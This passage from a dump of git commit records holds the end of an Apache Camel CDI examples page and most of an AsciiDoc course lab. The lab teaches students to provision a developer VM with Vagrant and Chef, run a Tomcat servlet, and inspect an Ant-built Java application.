Kubernetes\n\n|camel-example-cdi-metrics\n|Illustrates the integration between Camel, Dropwizard Metrics and CDI\n\n|camel-example-cdi-properties\n|Illustrates the integration between Camel, DeltaSpike and CDI for\nconfiguration properties\n\n|camel-example-cdi-osgi\n|A\u00a0CDI application using the SJMS component that can be executed\ninside an OSGi container using PAX CDI\n\n|camel-example-cdi-rest-servlet\n|Illustrates the Camel REST DSL being used in a Web application that\nuses CDI as dependency injection framework\n\n|camel-example-cdi-test\n|Demonstrates the testing features that are provided as part of\nthe integration between Camel and CDI\n\n|camel-example-cdi-xml\n|Illustrates the use of Camel XML configuration\nfiles into a Camel CDI application\n\n|camel-example-swagger-cdi\n|An example using REST DSL and Swagger Java with CDI\n\n|camel-example-widget-gadget-cdi\n|The Widget and Gadget use-case from the EIP book implemented\nin Java with CDI dependency Injection\n\n|============================================\n\n### See Also\n\n* link:cdi-testing.html[Camel CDI testing]\n* http:\/\/www.cdi-spec.org[CDI specification Web site]\n* http:\/\/www.cdi-spec.org\/ecosystem\/[CDI ecosystem]\n* http:\/\/weld.cdi-spec.org[Weld home page]\n* http:\/\/openwebbeans.apache.org[OpenWebBeans home page]\n* https:\/\/github.com\/astefanutti\/further-cdi[Going further with CDI and Camel]\n(See Camel CDI section)\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"07a3c2a7c6be210faf6846418746e4b4965ea690","subject":"Lab 03","message":"Lab 03\n","repos":"dm-academy\/aitm-labs,dm-academy\/aitm-labs,dm-academy\/aitm-labs","old_file":"Lab-03\/03-tech-lab.adoc","new_file":"Lab-03\/03-tech-lab.adoc","new_contents":"= Lab 03 (Technical) The core application practices\n\n== Bringing up the VM\n\n**Overview**\n\nThe purpose of this lab is to give you a realistic, if brief overview of (reasonably) modern application development practices.\n\nLab objectives:\n\nIn this lab, you will work with basic application tools, as an individual developer. 
You will see test-driven development in action, in a very simple form, with automated build and deployment to a local Tomcat instance.\n\nYou will start by initializing a Vagrant machine that has been preconfigured as a simple developer workstation with:\n\n* https:\/\/en.wikipedia.org\/wiki\/Java_(programming_language)[Java]\n* http:\/\/junit.org\/[JUnit]\n* http:\/\/ant.apache.org\/[Ant]\n* http:\/\/tomcat.apache.org\/[Tomcat]\n* https:\/\/git-scm.com\/[git]\n\n**Prerequisites**\n\nYou must have completed lab 2 and issued pull requests for me.\n\n**Clone the Examples repository**\n\nLog into the main server via ssh in the usual way.\n\nMake sure you are in your home directory.\n\n cd ~\n\nInstall the following Vagrant plugin (you do have permissions to do this)\n\n....\nYourStudentID@serverXXX:~$ vagrant plugin install vagrant-berkshelf\nInstalling the 'vagrant-berkshelf' plugin. This can take a few minutes...\nInstalled the plugin 'vagrant-berkshelf (4.0.4)'!\nPost install message from the 'vagrant-berkshelf' plugin:\n\nThe Vagrant Berkshelf plugin requires Berkshelf from the Chef Development Kit.\nYou can download the latest version of the Chef Development Kit from:\n\n https:\/\/downloads.getchef.com\/chef-dk\n\nInstalling Berkshelf via other methods is not officially supported.\n....\n\nClone the Calavera project:\n\n....\nYourStudentID@serverXXX:~$ git clone https:\/\/github.com\/dm-academy\/Calavera.git\nCloning into 'Calavera'...\nremote: Counting objects: 1447, done.\nremote: Compressing objects: 100% (87\/87), done.\nremote: Total 1447 (delta 45), reused 0 (delta 0), pack-reused 1350\nReceiving objects: 100% (1447\/1447), 45.53 MiB | 3.09 MiB\/s, done.\nResolving deltas: 100% (652\/652), done.\nChecking connectivity... done.\n....\nChange to the Calavera directory:\n\n YourStudentID@serverXXX:~$ cd Calavera\/\n\nNow, you will see a new Vagrantfile. Have a look at it:\n\n YourStudentID@serverXXX:~\/Calavera$ more Vagrantfile\n\n(File is lengthy. More only shows you one screen at a time. You can hit the space bar repeatedly to go through it, or q to exit.)\n\nThere are a number of machines defined, such as\n\n\n....\n###############################################################################\n################################### base #################################\n###############################################################################\n....\n\nEach section like that defines how Vagrant should bring up a machine and configure it. There are a number of new commands we haven't seen before. 
Let's focus on the following:\n\n....\n\n###############################################################################\n################################### manos1 ##############################\n###############################################################################\n\n config.vm.define \"manos1\" do | manos1 |\n manos1.vm.host_name =\"manos1.calavera.biz\"\n manos1.vm.network \"private_network\", ip: \"10.1.0.14\"\n manos1.vm.network \"forwarded_port\", guest: 22, host: 2114, auto_correct: true\n manos1.vm.network \"forwarded_port\", guest: 80, host: 8114, auto_correct: true\n manos1.vm.network \"forwarded_port\", guest: 8080, host: 9114, auto_correct: true\n\n manos1.ssh.forward_agent =true\n\n manos1.vm.synced_folder \".\", \"\/home\/manos1\"\n manos1.vm.synced_folder \".\/shared\", \"\/mnt\/shared\"\n #manos1.vm.provision :shell, path: \".\/shell\/manos1.sh\"\n\n manos1.vm.provision :chef_zero do |chef|\n chef.cookbooks_path = [\".\/cookbooks\/\"]\n chef.data_bags_path = [\".\/data_bags\/\"]\n chef.nodes_path = [\".\/nodes\/\"]\n chef.roles_path = [\".\/roles\/\"]\n chef.add_recipe \"shared::_apt-update\"\n chef.add_recipe \"git::default\"\n chef.add_recipe \"localAnt::default\"\n chef.add_recipe \"java7::default\" # this is redundant. we already installed this in base and tomcat also installs Java. but won't work w\/o it.\n chef.add_recipe \"localTomcat::v8\"\n chef.add_recipe \"shared::_junit\"\n chef.add_recipe \"manos::default\"\n if ENV['LAB_NUM']==\"lab03\"\n puts \"Skipping remote git\"\n else\n chef.add_recipe \"manos::git-remote.rb\"\n end\n end\n end\n....\n\nYou used a shell provisioner in your previous lab to apply your script to your new VM. But what's this? This line in the example above\n\n #manos1.vm.provision :shell, path: \".\/shell\/manos1.sh\"\n\nis commented out (the # means that Vagrant won't execute that line).\n\nRather than using a shell provisioner to install software on our VM, we are starting to use Chef. As mentioned in the http:\/\/dm-academy.github.io\/aitm\/#_policy_based_approaches[readings for Session 02], Chef is a configuration management system.\n\nNow, http:\/\/searchaws.techtarget.com\/definition\/Opscode-Chef[read a bit about Chef] and https:\/\/docs.chef.io\/chef_quick_overview.html[a bit more] before you continue.\n\nA full treatment of Chef is beyond the scope of this class. However, you should understand a few things. You should still be in your Calavera directory. 
Run the tree command:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ tree\n\n\u251c\u2500\u2500 Berksfile\n\u251c\u2500\u2500 Berksfile.lock\n\u251c\u2500\u2500 cookbooks\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 base\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 calaverahosts\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 ssh.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 _hosts.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 _ssh.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 brazos\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 cara\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 cerebro\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 post-receive\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 espina\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 hombros\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 hijoConfig.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 OLD-hijoInit.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 org.jfrog.hudson.ArtifactoryBuilder.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 java7\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 java8\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localAnt\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 attributes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 
\u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 env.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 ant.sh\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localJenkins\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 localTomcat\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 v6.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 v8.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 manos\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 build.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 INTERNAL_gitignore\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 TestClass1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 nervios\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 nervios.sh\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 pies\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 files\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 pies.sh\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 shared\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 _apt-update.rb\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 _junit.rb\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 test\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 metadata.rb\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 recipes\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 default.rb\n\u251c\u2500\u2500 data_bags\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 README.txt\n\n(more files)\n....\n\nThe \".rb\" extension indicates the Ruby language, which is used to develop Chef scripts.\n\nTIP: If you are using Putty or some other terminal emulator and getting garbage characters like \u00e2\u00e2\u00e2 in your tree, see http:\/\/unix.stackexchange.com\/questions\/61293\/how-can-i-change-locale-encoding-to-avoid-getting-weird-characters-in-terminal[here].\n\nThis directory structure is the entire Calavera project, which is a simple DevOps simulation that all runs through Vagrant.\n\nExamine the Vagrantfile again (use `cat` or `more`), and notice in the Vagrantfile the directives:\n\n manos.vm.provision :chef_zero do |chef|\n\nThe above tells Vagrant to use Chef to set 
up the virtual machine.\n\n chef.cookbooks_path = [\".\/cookbooks\/\"]\n\nThe above tells Chef where the cookbooks are.\n\n....\nchef.add_recipe \"shared::_apt-update\"\nchef.add_recipe \"git::default\"\nchef.add_recipe \"localAnt::default\"\nchef.add_recipe \"java7::default\"\nchef.add_recipe \"localTomcat::v8\"\nchef.add_recipe \"shared::_junit\"\nchef.add_recipe \"manos::default\"\n\n....\n\nFinally, the above tells Chef to apply a series of recipes from various parts of the tree. These recipes install software and configure the system in various ways.\n\n*Have a look at some of them.* Use \"cat.\"\n\n YourStudentID@serverXXX:~\/Calavera$ cat cookbooks\/localAnt\/recipes\/default.rb\n\nThe combination of these recipes precisely describes what the virtual machine will look like. If you delete a VM and bring it back up, it should look exactly the same every time.\n\nNow, the current Vagrantfile is a little dangerous, because if you type \"vagrant up\" it will try to bring up ALL of the machines. So, I have created a shell script you should use.\n\nIMPORTANT: DO NOT ISSUE A `vagrant up` COMMAND IN THIS LAB.\n\nReturn to the Calavera base directory and issue the following commands:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ cd ~\/Calavera\/\nYourStudentID@serverXXX:~\/Calavera$ .\/lab-03.sh\nLab 03 manos configuration\nLaunching from linux\/mac\nSkipping remote git\nBringing machine 'manos1' up with 'virtualbox' provider...\n manos1: The Berkshelf shelf is at \"\/home\/char\/.berkshelf\/vagrant-berkshelf\/shelves\/berkshelf20160925-23989-fdanrr-manos1\"\n==> manos1: Sharing cookbooks with VM\n==> manos1: Importing base box 'opscode-ubuntu-14.04a'...\n==> manos1: Matching MAC address for NAT networking...\n [more]\n....\n\nIt will take several minutes to launch the new Vagrant instance. In the meantime, YOU NEED TO WATCH THE OUTPUT.\n\nLook for the language \"Fixed port collision\" in a series like this. THE NUMBERS WILL BE DIFFERENT:\n\n....\n==> manos: Fixed port collision for 22 => 2114. Now on port 2201.\n==> manos: Fixed port collision for 80 => 8114. Now on port 2202.\n==> manos: Fixed port collision for 8080 => 9114. Now on port 2203.\n==> manos: Fixed port collision for 22 => 2222. Now on port 2214.\n==> manos: Clearing any previously set network interfaces...\n==> manos: Preparing network interfaces based on configuration...\n manos: Adapter 1: nat\n==> manos: Forwarding ports...\n manos: 22 => 2201 (adapter 1)\n manos: 80 => 2202 (adapter 1)\n manos: 8080 => 2203 (adapter 1)\n manos: 22 => 2214 (adapter 1)\n==> manos: Booting VM...\n....\n\nMAKE NOTE OF THE PORT 8080 MAPPING. In the above, it says \"Now on port 2203.\" You will have a DIFFERENT number. Write it down.\n\n****\nONLY *if you miss your port*, or can't find it, you will need to do:\n\n vboxmanage list vms\n\nYou should see output including something like:\n\n\"Calavera_manos_XXXXXXXXXXXXX_XXXXX\" {389dab0f-2f52-434e-bf50-c9792c42416a}\n\nGo:\n\n vboxmanage showvminfo Calavera_manos_XXXXXXXXXXXXX_XXXXX|more (replacing the X's with the actual numbers, you should cut and paste)\n\nLook for this line:\n\n....\nNIC 1 Rule(3): name = tcp8134, protocol = tcp, host ip = , host port = XXXX, guest ip = , guest port = 8080\n....\n\nCopy down the \"XXXX.\" It is your port 8080 mapping.\n****\n\nOnce you have your port 8080 mapping and the Vagrant launching process is complete, you can access your VM's web server. Manos comes preconfigured with a running Tomcat instance and a simple test-harness based Java application. 
You can see it running when you ssh into the VM:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ vagrant ssh manos\nWelcome to Ubuntu 14.04.2 LTS (GNU\/Linux 3.13.0-24-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nLast login: Sat Feb 21 22:03:53 2015 from 10.0.2.2\n....\n\nNext, run the curl command pointing at the running web application:\n....\nvagrant@manos:~$ curl localhost:8080\/MainServlet\n<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\nWhat is \"curl\"? curl is like a web browser for the command line.\nFor more read @ http:\/\/curl.haxx.se\/docs\/manpage.html\n\nYou can also see the same thing from OUTSIDE your virtual machine:\n\n....\nvagrant@manos:~$ exit\nlogout\nConnection to 127.0.0.1 closed.\ntest4@seis660:~\/Calavera$ curl 127.0.0.1:2203\/MainServlet\n<h1>This is a skeleton application-- to explore the end to end Calavera delivery framework.<\/h1>\n....\n\nIMPORTANT: Instead of typing 2203 for the port number, you should substitute the port number that 8080 was mapped to by Vagrant.\n\nFinally, you can view it in a real browser over X windows.\n\nNOTE: You may not find much use for X-windows in the outside world, but it is helpful here as it prevents us from worrying about hardening the local Vagrant VMs.\n\nFirst, be sure you logged into the server with X enabled. You need to either:\n\n* Check the box in Putty \/\/ For people using xming 6.9 above, there will be enable x11 forwarding checkbox under ssh.\n* go \"ssh -X YourStudentID@serverXXX\" if you are using your Mac console\n\nNOTE: You do *not* need Firefox on your local laptop for this to work. You *do* need to have X11 forwarding working, with a local Xwindows display. For example, if XMing is installed, open XLaunch and click through the screens with the defaults. See also https:\/\/github.com\/dm-academy\/aitm-labs\/blob\/master\/Lab-00\/00-tech-lab.adoc[Lab 00], Configuring X-Windows.\n\nType \"xclock\" for a quick test. See https:\/\/github.com\/dm-academy\/aitm-labs\/blob\/master\/Lab-00\/00-tech-lab.adoc[Configuring X-Windows] in Lab 00.\n\nAt the command line, go:\n....\nYourStudentID@serverXXX:~$ firefox -no-remote \"127.0.0.1:2203\/MainServlet\"\n\n(process:46597): GLib-CRITICAL **: g_slice_set_config: assertion 'sys_page_size == 0' failed\nGtk-Message: Failed to load module \"canberra-gtk-module\"\n....\n\nIt will throw a lot of errors, ignore them. You should (slowly) get a Firefox browser painted on your screen. This is X-windows in action, Firefox is actually running on the server.\n\nimage::browser2.png[]\n\nYou can either close Firefox or hit Command-C to exit.\n\nExit your VM.\n\n== A look at the application\n\nLet's look at what goes into making this little app work. First, how did it get there? If you are still in your VM, exit from the VM back to the classroom server. 
Be sure you are in the Calavera directory.\n\nYou can see the resources used by the application if you go:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ tree cookbooks\/manos\/\ncookbooks\/manos\/\n\u251c\u2500\u2500 files\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 build.xml\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 INTERNAL_gitignore\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 TestClass1.java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u251c\u2500\u2500 metadata.rb\n\u2514\u2500\u2500 recipes\n \u2514\u2500\u2500 default.rb\n....\n\nNow, the cookbook here includes the raw ingredients (the contents of the cookbooks\/manos\/files directory) as well as the recipes of how to set them up on the VM. Especially, have a look at cookbooks\/manos\/recipes\/default.rb:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ more cookbooks\/manos\/recipes\/default.rb\n# manos-default\n\n# set up developer workstation\n\n# assuming Chef has set up Java, Tomcat, ant and junit\n# need to establish directory structure\n# move source code over\n\npackage \"tree\"\n\ngroup 'git'\n\nuser 'vagrant' do\n group 'git'\nend\n\n[\"\/home\/hijo\/src\/main\/config\",\n \"\/home\/hijo\/src\/main\/java\/biz\/calavera\",\n \"\/home\/hijo\/src\/test\/java\/biz\/calavera\",\n \"\/home\/hijo\/target\/biz\/calavera\"].each do | name |\n\n directory name do\n mode 00775\n action :create\n user \"vagrant\"\n group \"git\"\n recursive true\n end\nend\n\nfile_map = {\n \"INTERNAL_gitignore\" => \"\/home\/hijo\/.gitignore\",\n \"build.xml\" => \"\/home\/hijo\/build.xml\",\n \"web.xml\" => \"\/home\/hijo\/src\/main\/config\/web.xml\",\n \"Class1.java\" => \"\/home\/hijo\/src\/main\/java\/biz\/calavera\/Class1.java\",\n \"MainServlet.java\" => \"\/home\/hijo\/src\/main\/java\/biz\/calavera\/MainServlet.java\",\n \"TestClass1.java\" => \"\/home\/hijo\/src\/test\/java\/biz\/calavera\/TestClass1.java\"\n}\n\n# download each file and place it in right directory\nfile_map.each do | fileName, pathName |\n cookbook_file fileName do\n path pathName\n user \"vagrant\"\n group \"git\"\n action :create\n end\nend\n\n...\n....\n\nThere is more, but you get the idea. Without going into the https:\/\/en.wikipedia.org\/wiki\/Ruby_(programming_language)[Ruby] code this is written in (which would be too much detail for this class), this script is creating a set of directory structures on the new manos VM and populating them with the basic https:\/\/en.wikipedia.org\/wiki\/Java_(programming_language)[Java] and https:\/\/en.wikipedia.org\/wiki\/Apache_Ant[Ant] files needed. For example, this command:\n\n \"build.xml\" => \"\/home\/hijo\/build.xml\"\n\nsays,\n\n. take the file called `build.xml` from the source files on the host, and\n. 
copy it into `\/home\/hijo\/build.xml` on the guest.\n\nGo back into your manos VM and have a look at the home\/hijo directory:\n\n....\nYourStudentID@serverXXX:~\/Calavera$ vagrant ssh manos\nWelcome to Ubuntu 14.04.2 LTS (GNU\/Linux 3.13.0-24-generic x86_64)\n\n * Documentation: https:\/\/help.ubuntu.com\/\nLast login: Sun Feb 22 18:29:29 2015 from 10.0.2.2\n....\n\nNow run the tree command:\n\n....\nvagrant@manos:~$ tree \/home\/hijo\n\/home\/hijo\n\u251c\u2500\u2500 build.xml\n\u251c\u2500\u2500 src\n\u2502\u00a0\u00a0 \u251c\u2500\u2500 main\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 config\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 web.xml\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 biz\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.java\n\u2502\u00a0\u00a0 \u2502\u00a0\u00a0 \u2514\u2500\u2500 MainServlet.java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 test\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 java\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 biz\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 TestClass1.java\n\u2514\u2500\u2500 target\n \u251c\u2500\u2500 biz\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 calavera\n \u2502\u00a0\u00a0 \u251c\u2500\u2500 Class1.class\n \u2502\u00a0\u00a0 \u251c\u2500\u2500 MainServlet.class\n \u2502\u00a0\u00a0 \u2514\u2500\u2500 TestClass1.class\n \u251c\u2500\u2500 CalaveraMain.jar\n \u251c\u2500\u2500 result.txt\n \u251c\u2500\u2500 result.xml\n \u2514\u2500\u2500 web.xml\n\n....\n\nThat configured directory tree is the outcome of the Chef scripts that were applied when the first Vagrant up was done.\n\nWithout going deeply into object-oriented programming, this application has three major parts:\n\n. A main class that controls everything (`MainServlet.java`).\n. A class called `Class1.java` that does 2 things:\n.. Returns a string \"five\" when you call the `.five` method on the class\n.. Wraps any string with the tags <H1> and <\/H1>, turning it into an HTML heading 1 string.\n. A test class, `TestClass1.java`, that tests `Class1.java` (but not `MainServlet.java`, just because that gets complicated for a simple exercise like this).\n\nBut wait, there is more. How is Tomcat actually serving up the servlet?\n\nRun tree:\n\n....\nvagrant@manos:\/home\/hijo$ tree \/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/\n\/var\/lib\/tomcat6\/webapps\/ROOT\/WEB-INF\/\n\u251c\u2500\u2500 lib\n\u2502\u00a0\u00a0 \u2514\u2500\u2500 CalaveraMain.jar\n\u2514\u2500\u2500 web.xml\n\n1 directory, 2 files\n....\n\nIn order for the `CalaveraMain.jar` file to be served up, it needs to be put in the `WEB-INF\/lib` directory that Tomcat knows about, and the `web.xml` file needs to be updated as well. How did this happen?\n\nAnd as a matter of fact, where did that `CalaveraMain.jar` file come from, anyways? It wasn't part of the files stored in the cookbook...!? Go back and look.\n\nThis is where the magic of Ant comes in. `CalaveraMain.jar` is a **compiled and packaged** version of the java classes you see in the `java\/biz\/calavera` directory.\n\nBack when Java first came out, the developer would have to painstakingly compile and package the software by hand, move it manually to the Tomcat directory, and restart Tomcat. But with Ant (and similar tools like https:\/\/maven.apache.org\/[Maven]), we can do this all automatically. 
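For concreteness, here is a hedged sketch of what a class like Class1 might look like, consistent with the behavior described above (the real source is in src\/main\/java\/biz\/calavera and may differ in detail):\n\n[source,java]\n----\npackage biz.calavera;\n\n\/\/ Sketch only: models the two behaviors described above.\npublic class Class1 {\n\n private final String message;\n\n public Class1(String message) {\n this.message = message;\n }\n\n \/\/ Returns the string \"five\"\n public String five() {\n return \"five\";\n }\n\n \/\/ Wraps the stored message in an HTML heading 1\n public String webMessage() {\n return \"<h1>\" + message + \"<\/h1>\";\n }\n}\n----\n\n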
